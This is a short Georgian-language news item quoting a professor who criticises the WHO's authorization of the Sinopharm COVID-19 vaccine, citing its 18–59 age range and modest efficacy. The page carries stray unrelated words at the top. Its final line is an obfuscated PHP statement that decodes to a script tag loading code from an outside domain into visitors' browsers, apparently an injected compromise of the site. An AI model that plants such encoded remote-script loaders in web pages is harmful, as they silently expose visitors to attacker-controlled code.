celsiusi
ავერსი საქკაბელი

პროფესორის, ორგანიზაციის – „აკრედიტაცია საზღვრების გარეშე“ – ხელმძვანელის, გიორგი განცხადებით, ჯანმოს გადაწყვეტილება “სინოფარმის” ვაქცინის ავტორიზაციის შესახებ კარგია, თუმცა დოკუმენტიში აღნიშნულია ბევრი დეტალი, რომლებიც ძალიან საყურადღებოა და მნიშვნელოვანი. 

 
მისივე თქმით, დოკუმენტში წერია, რომ ვაქცინა შესაძლებელია გამოყენებული იქნეს 18- დან 59 წლამდე და არა 60 წლის ზევით. 
 
“ჩინური “სინოფარმის” ავტორიზაციით ყველა ისეა გახარებული , რომ დეტალებს აღარ არკვევენ. მგონი არც წაიკითხეს რა წერია იმ დოკუმენტში. არადიპლმატიურ ენაზე რომ გითხრათ ვაქცინა დაუშვეს ღარიბი ქვეყნებისთვის. ექსპერტთა ჯგუფმა, რომლებმაც ურჩია გაეროს სააგენტოს ვაქცინების შესახებ, თქვა, რომ “დარწმუნებული იყო”, რომ “სინოფარმის” ვაქცინა იცავს 18-59 წლის ასაკს.”- განაცხადა ფხაკაძემ საინფორმაციო სააგენტო BUSINESS TIME-ს .
 
მისივე თქმით, პროცენტულობაზე საუბარი ზედმეტია, ვინაიდან თავად ჩინელებმა თქვეს რომ მისი ეფექტურობა 50,4% -ია. 
 
 “ასევე, წერია, რომ ვაქცინის ეფექტურობას დაბალი ნდობა ჰქონდა 60 წელს გადაცილებულ ადამიანებში და მაღალი ალბათობა არსებობს გვერდითი მოვლენების საშიშროების. ვფიქრობ ისე გაუხარდათ არც კითხულობენ რა წერია დოკუმენტში ან ვერ გაიგეს”- განაცხადა ფხაკაძემ.
 
შეგახსენებთ, რომ საქართველოში “სინოფარმით” ვაქცინაცია 4 მაისს დაიწყო.   ჯანდაცვის მსოფლიო ორგანიზაციის მიერ ავტორიზაცია კი ვაქცინამ დღეს მიიღო. 
 
 
7156
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");